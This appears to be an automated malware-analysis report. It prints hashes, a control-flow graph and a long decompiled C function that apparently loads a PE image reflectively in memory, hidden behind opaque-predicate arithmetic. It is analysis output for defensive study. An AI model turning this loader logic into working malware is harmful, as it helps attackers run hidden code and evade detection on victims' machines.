                                                                                                            • Instruction ID: ae232e1038543a87835a4795d6aa86e40daf30d89f668916441cffa0c1b4fc0d
                                                                                                            • Opcode Fuzzy Hash: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
                                                                                                            • Instruction Fuzzy Hash: 81F0493AA00328AFFB21DF15DCC5F0ABB75F741754F258024F6456A4B2C6B36850EB19
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10005260 Relevance: 7.1, APIs: 4, Instructions: 1092memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 152 10005260-1000530c 153 10006011-1000601a 152->153 154 10005312-10005361 152->154 154->153 155 10005367-10005409 154->155 155->153 156 1000540f-10005488 155->156 156->153 157 1000548e-100054cb 156->157 157->153 158 100054d1-10005505 157->158 158->153 159 1000550b-10005594 158->159 160 1000559a-100055be 159->160 161 100056bc-100056c2 159->161 163 100055c4-100055d1 160->163 162 100056c8-10005803 GetNativeSystemInfo call 10002bf0 * 2 161->162 162->153 175 10005809-10005914 162->175 165 100055d3-10005602 163->165 166 10005604-10005642 163->166 168 10005644-10005654 165->168 166->168 170 10005656-10005697 168->170 171 10005699 168->171 173 1000569f-100056b4 170->173 171->173 173->163 174 100056ba 173->174 174->162 177 10005a04-10005a9b GetProcessHeap HeapAlloc 175->177 178 1000591a-100059fc 175->178 179 10005ae8-10005bdd call 10002c60 177->179 180 10005a9d-10005ae7 177->180 178->153 185 10005a02 178->185 186 10005be3-10005e5a memcpy call 10002ca0 179->186 187 10006008-1000600e call 10004dd0 179->187 185->177 186->187 193 10005e60-10005ec1 186->193 187->153 194 10005ec7-10005f56 call 10003b80 193->194 195 10005f58 193->195 197 10005f5f-10005f91 call 10003f40 194->197 195->197 197->187 201 10005f93-10005fd6 call 10003570 197->201 203 10005fdb-10005fe0 201->203 203->187 204 10005fe2-10006006 call 10003ad0 203->204 204->187 207 1000601b-10006026 204->207 208 1000602c-10006031 207->208 209 1000610d-1000611d 207->209 210 10006033-100060a4 208->210 211 100060a5-1000610c 208->211
                                                                                                            C-Code - Quality: 73%
                                                                                                            			E10005260() {
				signed int _t340;
				signed int _t351;
				signed int _t354;
				signed int _t356;
				signed int _t360;
				void* _t373;
				signed int _t385;
				signed int _t388;
				signed int _t398;
				signed int _t403;
				intOrPtr _t405;
				void* _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t423;
				signed int _t425;
				void* _t433;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				void* _t441;
				signed int _t442;
				signed int _t444;
				signed int _t448;
				intOrPtr _t453;
				signed int _t454;
				signed int _t463;
				void* _t467;
				signed int _t468;
				signed int _t469;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t476;
				intOrPtr _t478;
				signed int _t481;
				void* _t492;
				signed int _t498;
				signed int _t520;
				intOrPtr _t523;
				signed int _t532;
				signed int _t533;
				signed short* _t542;
				signed int _t545;
				signed int _t563;
				signed int _t571;
				signed int _t579;
				signed int _t580;
				signed int _t583;
				intOrPtr _t585;
				signed int _t587;
				signed int _t590;
				signed int _t604;
				signed int _t624;
				intOrPtr _t636;
				signed int _t637;
				signed int _t642;
				signed int _t665;
				signed int _t668;
				signed int _t673;
				signed int _t691;
				signed int _t692;
				signed int _t706;
				signed int _t707;
				signed int _t716;
				signed int _t717;
				signed int _t722;
				signed int _t726;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t736;
				signed int _t738;
				signed int _t739;
				signed int _t743;
				signed int _t752;
				signed int _t754;
				signed int _t756;
				signed int _t759;
				signed int _t761;
				signed int _t765;
				signed int _t766;
				signed int _t770;
				signed int _t778;
				signed int _t780;
				signed int _t789;
				signed int _t795;
				signed int _t836;
				signed int _t840;
				signed int _t841;
				signed int _t853;
				signed int _t867;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t895;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t907;
				signed int _t913;
				signed int _t918;
				signed int _t921;
				signed int _t924;
				signed int _t928;
				signed int _t930;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t941;
				intOrPtr* _t951;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t962;
				signed int _t963;
				signed int _t970;
				signed int _t971;
				signed int _t981;
				signed int _t988;
				signed int _t989;
				signed int _t995;
				signed int _t1035;
				signed int _t1041;
				signed int _t1042;
				signed int _t1043;
				signed short _t1049;
				signed int _t1050;
				signed int _t1051;
				signed int _t1064;
				intOrPtr* _t1066;
				signed int _t1067;
				signed int _t1075;
				signed int _t1076;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1091;
				signed int _t1094;
				signed int _t1097;
				signed int _t1126;
				signed int _t1128;
				signed int _t1132;
				signed int _t1135;
				signed int _t1138;
				signed int _t1153;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				intOrPtr* _t1168;
				signed int _t1169;
				signed int _t1170;
				signed int _t1174;
				signed int _t1184;
				signed int _t1187;
				signed int _t1200;
				void* _t1202;
				signed int _t1227;
				signed int _t1237;
				void* _t1248;
				void* _t1249;
				void* _t1250;
				void* _t1251;

				_t691 =  *0x1004b0ec; // 0x0
				_t340 =  *0x1004b0e4; // 0x0
				_t981 =  *0x1004b0e0; // 0x0
				_t932 =  *0x1004b0d8; // 0x0
				_t795 =  *0x1004b0dc; // 0x0
				_t933 =  *0x1004b0e8; // 0x0
				_t4 = _t981 * _t933 + 2; // 0x2
				_t5 = _t795 + 0x3fffffff; // 0x3fffffff
				_t6 = _t691 + 0x3fffffff; // 0x3fffffff
				_t934 =  *0x1004b0e0; // 0x0
				_t532 =  *0x1004b0d8; // 0x0
				 *(_t1248 + 0x14) = 0;
				if( *((intOrPtr*)(_t1248 + 0x60)) + ((_t691 * 0x3fffffff + _t6 * _t340 + _t933 << 1) - (_t934 * _t532 * _t795 + 1) * _t795 + _t532) * 2 < 0x40 + (_t5 * _t340 + (_t340 + _t4) * _t981 + _t933 + (_t981 * 0x3fffffff - (_t691 * _t932 + 1) * _t340 + _t795 + 2) * _t932 + _t691 + _t795) * 4) {
					L32:
					return 0;
				} else {
					_t988 =  *0x1004b0e0; // 0x0
					_t533 = _t532 * _t795;
					_t941 =  *0x1004b0e8; // 0x0
					_t989 = _t988 * _t691;
					 *(_t1248 + 0x10) = _t533;
					 *(_t1248 + 0x30) = _t989;
					_t542 =  *(_t1248 + 0x5c);
					if(( *_t542 & 0x0000ffff) != (_t533 - _t941 + _t941 * 2 - _t340 - _t691 << 1) - (_t691 + _t691 + (_t989 * _t691 + _t795) * _t795 * 2) *  *0x1004b0e0 + 0x5a4d) {
						goto L32;
					} else {
						_t995 = _t941 * _t691;
						 *(_t1248 + 0x20) = _t542[0x1e];
						 *(_t1248 + 0x2c) = _t995;
						_t545 =  *0x1004b0d8; // 0x0
						_t26 = (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545) * 2; // 0x7
						_t1126 =  *0x1004b0e0; // 0x0
						_t36 = _t691 + 1; // 0x1
						if( *((intOrPtr*)(_t1248 + 0x60)) + (_t36 * _t340 + (((_t941 * _t941 * _t941 + _t795 * _t795) * 0x3fffffff + _t1126) * _t795 + 1) * _t941 +  *(_t1248 + 0x10) + _t691) * 4 <  *(_t1248 + 0x20) + (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545 + _t26 + 7) *  *0x1004b0e0 + _t691 * 0x55555551 + _t545 + (_t691 * 0x55555551 + _t545) * 2 + (_t340 * 4 - 5) * _t795 + _t941 * 7 - _t340 + 0xf8) {
							goto L32;
						} else {
							_t1128 =  *0x1004b0e8; // 0x0
							_t951 = (_t795 - _t691 + 1) * _t795 + (_t795 - _t691 + 1) * _t795 * 4 - (_t691 + _t691 * 4 + 5) * _t1128 - _t691 + _t691 * 4 + ( *(_t1248 + 0x5c))[0x1e] +  *(_t1248 + 0x5c);
							_t47 = _t340 + 0x7fffffff; // 0x7fffffff
							 *(_t1248 + 0x18) = _t340 + _t340;
							_t52 = _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + 0x4550; // 0x4550
							_t1132 =  *0x1004b0e8; // 0x0
							_t563 =  *0x1004b0d8; // 0x0
							 *((intOrPtr*)(_t1248 + 0x24)) = _t951;
							if( *_t951 != _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + _t52 - ( *(_t1248 + 0x18) + 2 + _t1132 * 2) * _t563) {
								goto L32;
							} else {
								_t1135 =  *0x1004b0e0; // 0x0
								_t1138 =  *0x1004b0e0; // 0x0
								if(( *(_t951 + 4) & 0x0000ffff) != ((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138 + 0x14c + (((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138) * 2) {
									goto L32;
								} else {
									 *(_t1248 + 0x1c) =  *(_t951 + 0x38);
									_t1035 =  *0x1004b0e0; // 0x0
									 *(_t1248 + 0x20) = _t563 + _t563 * 2;
									if(( *(_t1248 + 0x1c) &  *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691 + 0x00000001 + ( *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691) * 0x00000002) != 0) {
										goto L32;
									} else {
										_t1041 =  *0x1004b0e0; // 0x0
										_t1042 =  *0x1004b0e8; // 0x0
										_t1043 =  *0x1004b0e8; // 0x0
										_t571 =  *0x1004b0d8; // 0x0
										_t1153 =  *0x1004b0e0; // 0x0
										 *(_t1248 + 0x20) = ((_t563 * _t563 + _t1041) * _t563 + (_t563 - _t340 - _t691) * _t795 + (2 - _t1042 -  *0x1004b0d8) * _t1043 + (_t571 + _t795) * 2 - _t340 + _t691) * 0x78 + _t951 + ( *(_t951 + 0x14) & 0x0000ffff) + 0x18;
										_t579 =  *(_t1248 + 0x18);
										_t83 = _t795 - 2; // -2
										_t1049 = (_t795 + _t83 - _t579) * _t340 + ((_t1153 * _t795 + 1) * _t691 + 0x7fffffff) * _t1043 * 2 + ( *(_t951 + 6) & 0x0000ffff) - _t691 + _t691;
										if(_t1049 == 0) {
											_t580 =  *0x1004b0d8; // 0x0
											_t1050 =  *0x1004b0e8; // 0x0
										} else {
											 *((intOrPtr*)(_t1248 + 0x28)) =  ~_t579 - _t691 * 4;
											 *(_t1248 + 0x10) =  *(_t1248 + 0x20) + 0xc;
											_t673 =  *0x1004b0d8; // 0x0
											 *(_t1248 + 0x20) = _t1049;
											_t1086 =  *0x1004b0e8; // 0x0
											do {
												_t1237 =  *( *(_t1248 + 0x10) + 4);
												 *(_t1248 + 0x18) = _t1237;
												if(_t1237 != 0) {
													_t951 =  *((intOrPtr*)(_t1248 + 0x24));
													_t1091 = (4 + _t340 * 4) * _t673 + (_t1086 * 8 - 0xc) * _t795 +  *(_t1248 + 0x18) + (_t691 + _t691 * 2 + (_t691 + _t1086 * 2 + _t673 + 1) *  *0x1004b0e0 + _t1086) * 4 +  *( *(_t1248 + 0x10));
												} else {
													_t97 = _t795 + 0x7ffffffe; // 0x7ffffffe
													_t1094 =  *0x1004b0e0; // 0x0
													_t1091 =  *(_t1248 + 0x1c) + (((_t340 + _t691) * _t1086 + _t691) * 0x7fffffff + _t97 * _t795 + _t1094 * 2) * 2 +  *( *(_t1248 + 0x10));
												}
												 *(_t1248 + 0x18) = _t1091;
												if(_t1091 <=  *((intOrPtr*)(_t1248 + 0x28)) +  *(_t1248 + 0x14)) {
													_t673 =  *0x1004b0d8; // 0x0
												} else {
													_t1097 =  *0x1004b0e0; // 0x0
													_t673 =  *0x1004b0d8; // 0x0
													 *(_t1248 + 0x14) =  *(_t1248 + 0x18) + ((_t340 + _t795) * 0x3fffffff + ((_t340 *  *0x1004b0d8 + 1) * 0x3fffffff + _t1097) *  *0x1004b0e8 + _t1097 + _t691 + _t673) * 4;
												}
												_t1086 =  *0x1004b0e8; // 0x0
												 *(_t1248 + 0x10) =  *(_t1248 + 0x10) + 0x28;
												_t129 = _t1248 + 0x20;
												 *_t129 =  *(_t1248 + 0x20) - 1;
											} while ( *_t129 != 0);
										}
										_t133 =  *(_t1248 + 0x2c) * _t580 + 2; // 0x2
										 *0x1004d3bc(_t1248 + 0x34 + ((_t340 - _t691 - 4) * _t795 - (_t340 + _t133) * _t1050 + ( *(_t1248 + 0x30) + _t580 + 2) *  *0x1004b0e0 - _t691) * 0x6c);
										_t351 =  *0x1004b0e4; // 0x0
										_t692 =  *0x1004b0ec; // 0x0
										_t1165 =  *0x1004b0e8; // 0x0
										_t1051 =  *0x1004b0dc; // 0x0
										_t583 =  *0x1004b0e0; // 0x0
										 *(_t1248 + 0x34) = E10002BF0((2 - _t351 * _t351) * _t583 - _t692 + _t692 - _t1165 + _t1051 +  *((intOrPtr*)(_t1248 + 0x38)), (1 - _t1165) * _t351 * _t1051 +  *((intOrPtr*)(_t951 + 0x50)));
										_t354 =  *0x1004b0d8; // 0x0
										_t142 = _t354 + 0x7ffffffe; // 0x7ffffffe
										_t143 = _t354 + 2; // 0x2
										_t356 =  *0x1004b0e4; // 0x0
										_t360 =  *0x1004b0ec; // 0x0
										_t146 = _t1051 + 0xa; // 0xa
										_t706 =  *0x1004b0d8; // 0x0
										 *(_t1248 + 0x1c) =  *(_t1248 + 0x34) + (_t356 * 0x7fffffff + _t142 * _t1165 + _t1051 + _t1051 + _t143 * _t583 << 1) - (_t1051 + _t146) * _t360;
										_t707 = _t706 * _t1051;
										 *(_t1248 + 0x14) = _t707;
										_t1166 =  *0x1004b0ec; // 0x0
										 *(_t1248 + 0x34) = (_t707 * 0xfffffffd - (_t1165 * _t1165 + 3 + _t1165 * _t1165 * 2) * _t583 + 3) * _t583;
										_t1167 =  *0x1004b0d8; // 0x0
										_t373 = E10002BF0( *((intOrPtr*)(_t1248 + 0x3c)) + _t360, ( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167 + (( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167) * 2 +  *(_t1248 + 0x34) +  *(_t1248 + 0x18));
										_t1249 = _t1248 + 8;
										if( *(_t1248 + 0x20) != _t373) {
											goto L32;
										} else {
											_t716 =  *0x1004b0ec; // 0x0
											 *(_t1249 + 0x20) = _t716 * _t1167;
											_t165 = _t1051 + 2; // 0x3
											_t717 =  *0x1004b0e8; // 0x0
											_t166 = _t1167 + 1; // 0x1
											_t385 =  *0x1004b0e4; // 0x0
											_t388 =  *0x1004b0ec; // 0x0
											_t398 =  *0x1004b0e4; // 0x0
											_t403 =  *0x1004b0ec; // 0x0
											_t722 =  *0x1004b0e8; // 0x0
											_t182 = _t403 + 1; // 0x1
											_t1168 =  *((intOrPtr*)(_t1249 + 0x74));
											_t405 =  *_t1168((( ~_t1051 << 1) - ( *((intOrPtr*)(_t1249 + 0x30)) + 2) *  *0x1004b0e4 + _t583 << 2) - (_t403 + _t403 + _t403 * 2 + _t182 * _t722 * _t722 * 4) * _t1167 +  *((intOrPtr*)(_t951 + 0x34)),  *(_t1249 + 0x20), ((_t388 * _t388 * _t1167 + _t388 * _t388 * _t1167 * 0x00000002 - _t1051 + _t1051 * 0x00000002) * _t583 - _t1051 + _t1051 * 0x00000002) * _t1051 + (_t583 * _t1167 + _t583 * _t1167 * 0x00000002 - 0x00000003) * _t717 -  *(_t1249 + 0x28) +  *(_t1249 + 0x28) * 0x00000002 + 0x00001000 | (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + 0x00002000, ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + 4,  *((intOrPtr*)(_t1249 + 0x78)));
											_t1250 = _t1249 + 0x14;
											_t585 = _t405;
											 *((intOrPtr*)(_t1250 + 0x10)) = _t585;
											if(_t585 != 0) {
												L21:
												_t836 =  *0x1004b0e8; // 0x0
												_t726 =  *0x1004b0ec; // 0x0
												_t213 = (_t836 -  *0x1004b0dc + 1) * _t836 + _t726 + 0x40; // 0x41
												_t840 =  *0x1004b0d8; // 0x0
												_t1064 =  *0x1004b0e4; // 0x0
												_t841 =  *0x1004b0e8; // 0x0
												_t410 = HeapAlloc(GetProcessHeap(), 8 + ((_t841 + 1) *  *0x1004b0dc + (_t726 * 0x3fffffff + _t840) *  *0x1004b0e0 + _t726 * 0x3fffffff + _t1064) * 4, (1 - _t726) *  *0x1004b0e0 + _t213);
												_t731 =  *0x1004b0e8; // 0x0
												_t411 =  *0x1004b0e0; // 0x0
												_t412 =  *0x1004b0ec; // 0x0
												_t1066 = _t410 + (_t731 - _t411 - _t412 +  *0x1004b0dc << 6);
												if(_t1066 != 0) {
													 *((intOrPtr*)(_t1066 + 4)) = _t585;
													_t413 =  *0x1004b0e0; // 0x0
													_t732 =  *0x1004b0ec; // 0x0
													_t224 = _t732 * 2; // -268738780
													_t853 =  *0x1004b0e8; // 0x0
													_t733 =  *0x1004b0d8; // 0x0
													 *((intOrPtr*)(_t1066 + 0x20)) =  *((intOrPtr*)(_t1250 + 0x68));
													asm("sbb eax, eax");
													 *((intOrPtr*)(_t1066 + 0x2c)) =  *((intOrPtr*)(_t1250 + 0x74));
													 *(_t1066 + 0x14) =  ~( ~((_t413 + _t732) * _t413 + _t224 + 0x00001000 - _t853 + _t733 << 0x00000001 &  *(_t951 + 0x16) & 0x0000ffff));
													 *((intOrPtr*)(_t1066 + 0x24)) =  *((intOrPtr*)(_t1250 + 0x6c));
													 *((intOrPtr*)(_t1066 + 0x34)) =  *((intOrPtr*)(_t1250 + 0x78));
													 *((intOrPtr*)(_t1066 + 0x28)) =  *((intOrPtr*)(_t1250 + 0x70));
													 *((intOrPtr*)(_t1066 + 0x1c)) = _t1168;
													_t423 =  *0x1004b0e8; // 0x0
													_t736 =  *0x1004b0e4; // 0x0
													 *((intOrPtr*)(_t1066 + 0x3c)) = ((3 - _t423 + _t423 * 2) *  *0x1004b0ec - 6) *  *0x1004b0e0 + _t736 + _t736 * 2 - _t423 + _t423 * 2 +  *((intOrPtr*)(_t1250 + 0x38));
													_t1169 =  *0x1004b0ec; // 0x0
													_t425 =  *0x1004b0e4; // 0x0
													_t738 =  *0x1004b0e0; // 0x0
													_t587 =  *0x1004b0d8; // 0x0
													_t739 =  *0x1004b0e8; // 0x0
													 *((intOrPtr*)(_t1250 + 0x2c)) =  *((intOrPtr*)(_t951 + 0x54));
													_t867 =  *0x1004b0e0; // 0x0
													_t433 = E10002C60((_t739 + _t739 * 2 - 3) * _t1169 +  *((intOrPtr*)(_t1250 + 0x64)) + _t587 * _t587 - _t867 + (_t587 * _t587 - _t867) * 2,  *((intOrPtr*)(_t951 + 0x54)) + (_t425 * _t1169 + _t738 + _t739 + _t587) * 2 + _t425 * _t1169 + _t738 + _t739 + _t587);
													_t1251 = _t1250 + 8;
													if(_t433 == 0) {
														L31:
														_push(_t1066);
														E10004DD0();
														goto L32;
													} else {
														_t743 =  *0x1004b0e0; // 0x0
														_t436 =  *0x1004b0e8; // 0x0
														_t437 =  *0x1004b0dc; // 0x0
														_t752 =  *0x1004b0e0; // 0x0
														_t1170 =  *0x1004b0e4; // 0x0
														_t438 =  *0x1004b0e8; // 0x0
														_t441 =  *((intOrPtr*)(_t1251 + 0x78))( *((intOrPtr*)(_t1251 + 0x1c)),  *(_t1251 + 0x34) + (_t587 * 0x7fffffff + _t752) * 2, 0x1000 + ((_t1170 + _t437) * 0x3fffffff + (_t1169 * 0x3fffffff + _t437 + 2) * _t1169 + _t438) * 4, 4 + (((_t436 + _t1169 + _t437) * 0x3fffffff + _t587 + 2) * _t437 + _t1169 + (3 - _t743 *  *0x1004b0e4) * _t436 + _t752 * 2) * 4,  *((intOrPtr*)(_t1251 + 0x78)));
														_t754 =  *0x1004b0dc; // 0x0
														_t590 =  *0x1004b0d8; // 0x0
														_t1174 =  *0x1004b0d8; // 0x0
														 *(_t1251 + 0x34) = _t441;
														_t442 =  *0x1004b0e8; // 0x0
														_t888 =  *0x1004b0e4; // 0x0
														_t444 =  *0x1004b0ec; // 0x0
														memcpy( *(_t1251 + 0x34),  *(_t1251 + 0x70), ((2 - _t442) *  *0x1004b0e4 + _t1174 + 2) *  *0x1004b0e0 - (_t754 * _t754 + _t442 + _t590) *  *0x1004b0ec - _t888 * _t442 - _t442 * _t754 - _t444 - _t444 - _t754 - _t754 +  *((intOrPtr*)(_t951 + 0x54)));
														_t604 =  *0x1004b0d8; // 0x0
														_t756 =  *0x1004b0dc; // 0x0
														_t448 =  *0x1004b0e0; // 0x0
														_t890 =  *0x1004b0ec; // 0x0
														_t891 =  *0x1004b0d8; // 0x0
														_t279 = _t448 + 0x2e9; // 0x2e9
														_t453 =  *((intOrPtr*)(_t1251 + 0x40)) +  *((intOrPtr*)( *((intOrPtr*)(_t1251 + 0x7c)) + 0x3c)) + (((_t448 + _t890) * _t890 + (_t604 - _t756 + 1) *  *0x1004b0e4 + _t448 + _t891) * 0xf8 + (_t448 * _t891 - 0xfa) *  *0x1004b0e8 - _t279 *  *0x1004b0e4 + (_t448 + 0xfffffffe) *  *0x1004b0ec + _t756 * 0x2e5) * 2;
														 *_t1066 = _t453;
														_t759 =  *0x1004b0e4; // 0x0
														_t1184 =  *0x1004b0e0; // 0x0
														_t895 =  *0x1004b0e8; // 0x0
														_t1187 =  *0x1004b0ec; // 0x0
														 *((intOrPtr*)(_t453 + 0x34)) = (2 - _t759 + _t759) *  *0x1004b0e0 +  *((intOrPtr*)(_t1251 + 0x30)) + (_t759 * 0x7ffffffd + ((_t759 *  *0x1004b0ec + _t895 + 1) * 0x7fffffff + _t1184 *  *0x1004b0d8 *  *0x1004b0dc) * _t895 + _t1187) * 2;
														_t900 =  *0x1004b0e8; // 0x0
														_t454 =  *0x1004b0e4; // 0x0
														_t761 =  *0x1004b0ec; // 0x0
														_t624 =  *0x1004b0d8; // 0x0
														_t293 = _t624 + 1; // 0x1
														_t463 =  *0x1004b0e0; // 0x0
														_push((0xc0 - (_t454 * _t900 * _t761 + _t454 * _t900 * _t761 * 2 << 6)) * _t900 - (_t293 * _t761 + _t293 * _t761 * 2 << 6) + _t1066);
														_push(_t951);
														_push((0xfffffffc -  *0x1004b0e4) *  *0x1004b0dc - (_t463 + 1) * _t900 * _t761 - _t761 * _t624 - _t900 +  *((intOrPtr*)(_t1251 + 0x88)));
														_push( *((intOrPtr*)(_t1251 + 0x84)));
														_t467 = E10002CA0();
														_t1251 = _t1251 + 0x30;
														if(_t467 == 0) {
															goto L31;
														} else {
															_t468 =  *0x1004b0e8; // 0x0
															_t765 =  *0x1004b0d8; // 0x0
															_t1200 =  *0x1004b0dc; // 0x0
															_t903 =  *0x1004b0e4; // 0x0
															_t905 =  *0x1004b0ec; // 0x0
															_t1202 = _t765 - _t905 + _t905;
															_t907 =  *0x1004b0dc; // 0x0
															_t299 = _t1202 - 2; // -2
															_t636 = (_t765 + _t299) * _t907 + (((_t468 * _t765 - _t1200) * _t765 - 2) *  *0x1004b0e0 + _t468 * _t468 - _t903 + _t903 - _t905) * 2 +  *((intOrPtr*)( *_t1066 + 0x34)) -  *((intOrPtr*)(_t951 + 0x34));
															 *((intOrPtr*)(_t1251 + 0x60)) = _t636;
															if(_t636 == 0) {
																 *((intOrPtr*)(_t1066 + 0x18)) = 1;
															} else {
																_t963 =  *0x1004b0e0; // 0x0
																_t1227 =  *0x1004b0e4; // 0x0
																_push( *((intOrPtr*)(_t1251 + 0x60)) + ((_t963 - _t1227 +  *0x1004b0ec << 1) - (_t468 *  *0x1004b0ec * _t907 * _t907 * _t907 + _t963 * _t468) * _t468 + _t907) * 4);
																_t970 =  *0x1004b0e0; // 0x0
																_t971 =  *0x1004b0e4; // 0x0
																_push((((_t970 * _t970 << 1) - _t971 + _t468 + _t468 - 2) * _t907 - (_t907 + 4 + _t765 * 2) * _t971 + (_t765 - _t468 + _t468) * 2 << 6) + _t1066);
																_t492 = E10003B80();
																_t924 =  *0x1004b0e0; // 0x0
																_t1251 = _t1251 + 8;
																 *((intOrPtr*)(_t1066 + 0x18)) = _t492 - (_t924 *  *0x1004b0d8 << 2);
															}
															_t469 =  *0x1004b0e4; // 0x0
															_t766 =  *0x1004b0e0; // 0x0
															_push((_t766 - _t469 *  *0x1004b0e8 *  *0x1004b0ec *  *0x1004b0dc << 8) + _t1066);
															_t473 = E10003F40();
															_t1251 = _t1251 + 4;
															if(_t473 == 0) {
																goto L31;
															} else {
																_t474 =  *0x1004b0e8; // 0x0
																_t770 =  *0x1004b0dc; // 0x0
																_t637 =  *0x1004b0e4; // 0x0
																_t318 = _t474 * 2; // 0x1
																_t954 =  *0x1004b0ec; // 0x0
																_push(((1 - _t474 - _t770) *  *0x1004b0d8 + (_t770 + _t318 + 1) *  *0x1004b0e0 + _t770 * 2 - _t637 - _t954 + _t474 << 8) + _t1066);
																_t475 = E10003570();
																_t1251 = _t1251 + 4;
																if(_t475 == 0) {
																	goto L31;
																} else {
																	_t913 =  *0x1004b0e0; // 0x0
																	_push((_t913 *  *0x1004b0d8 *  *0x1004b0dc << 7) + _t1066);
																	_t476 = E10003AD0();
																	_t1251 = _t1251 + 4;
																	if(_t476 != 0) {
																		_t478 =  *((intOrPtr*)( *_t1066 + 0x28));
																		 *((intOrPtr*)(_t1251 + 0x60)) = _t478;
																		if(_t478 == 0) {
																			 *(_t1066 + 0x38) = 0;
																			return _t1066;
																		} else {
																			if( *(_t1066 + 0x14) == 0) {
																				_t481 =  *0x1004b0d8; // 0x0
																				_t955 =  *0x1004b0e0; // 0x0
																				_t918 =  *0x1004b0ec; // 0x0
																				_t778 =  *0x1004b0e8; // 0x0
																				_t331 = _t955 * _t778 - _t918 + 1; // 0x1
																				 *(_t1066 + 0x38) = (_t778 * _t778 * _t481 * 4 - 4) * _t955 + (4 - _t481 * 4) * _t918 +  *((intOrPtr*)(_t1251 + 0x60)) + (_t481 + _t331) *  *0x1004b0dc * 4 +  *((intOrPtr*)(_t1251 + 0x10));
																				return _t1066;
																			} else {
																				_t780 =  *0x1004b0ec; // 0x0
																				_t921 =  *0x1004b0d8; // 0x0
																				_t956 =  *0x1004b0e4; // 0x0
																				_t642 =  *0x1004b0dc; // 0x0
																				_t962 =  *0x1004b0e0; // 0x0
																				 *0x1004d404 = (_t780 * _t921 - (_t956 + _t642) * _t956 - 3) *  *0x1004b0e8 - _t921 * _t642 + _t962 * _t962 - _t780 - _t780 +  *((intOrPtr*)(_t1251 + 0x60)) + _t780 * _t921 + _t921 +  *((intOrPtr*)(_t1251 + 0x10));
																				 *((intOrPtr*)(_t1066 + 0x10)) = 1;
																				return _t1066;
																			}
																		}
																	} else {
																		goto L31;
																	}
																}
															}
														}
													}
												} else {
													_t1067 =  *0x1004b0d8; // 0x0
													_t928 =  *0x1004b0dc; // 0x0
													_t219 = ((_t1067 * _t928 - 1) * _t731 - 1) *  *0x1004b0e4 + _t412 + 0x8000; // 0x7fff
													 *((intOrPtr*)(_t1250 + 0x78))(_t585, 0, (_t412 * _t928 - 1) *  *0x1004b0e0 + _t219,  *((intOrPtr*)(_t1250 + 0x78)));
													return 0;
												}
											} else {
												_t789 =  *0x1004b0e4; // 0x0
												_t930 =  *0x1004b0dc; // 0x0
												_t1075 =  *0x1004b0d8; // 0x0
												_t1076 =  *0x1004b0ec; // 0x0
												_t194 = _t1076 - 4; // -4
												_t665 =  *0x1004b0e8; // 0x0
												_t498 =  *0x1004b0e0; // 0x0
												_t1084 =  *0x1004b0d8; // 0x0
												_t198 = (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084) * 2; // -3
												_t200 = _t1084 + 2; // 0x2
												_t1085 =  *0x1004b0ec; // 0x0
												_t668 =  *0x1004b0d8; // 0x0
												_t207 = (1 - _t668) * _t789 + _t1085 + _t930 + 0x1000; // 0x1001
												_t520 =  *0x1004b0e0; // 0x0
												_t1168 =  *((intOrPtr*)(_t1250 + 0x70));
												_t523 =  *_t1168(0,  *((intOrPtr*)(_t1250 + 0x20)) + _t520 *  *0x1004b0e8 * 2, (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084 + _t198 - 0x00000003) * _t789 - _t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002 + (_t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002) * 0x00000002 + 0x00002000 | (0x00000001 - _t668) * _t789 + _t1085 + _t930 + _t207, (1 - _t930) * _t665 + (1 - _t789 * _t930) * _t789 + _t498 + (_t1075 * _t1075 - _t789 * _t930 + _t194) * _t1076 + 4,  *((intOrPtr*)(_t1250 + 0x78)));
												_t1250 = _t1250 + 0x14;
												 *((intOrPtr*)(_t1250 + 0x10)) = _t523;
												if(_t523 == 0) {
													goto L32;
												} else {
													_t585 = _t523;
													goto L21;
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}







































































































































































                                                                                                            0x10005263
                                                                                                            0x10005269
                                                                                                            0x10005271
                                                                                                            0x10005278
                                                                                                            0x10005291
                                                                                                            0x1000529e
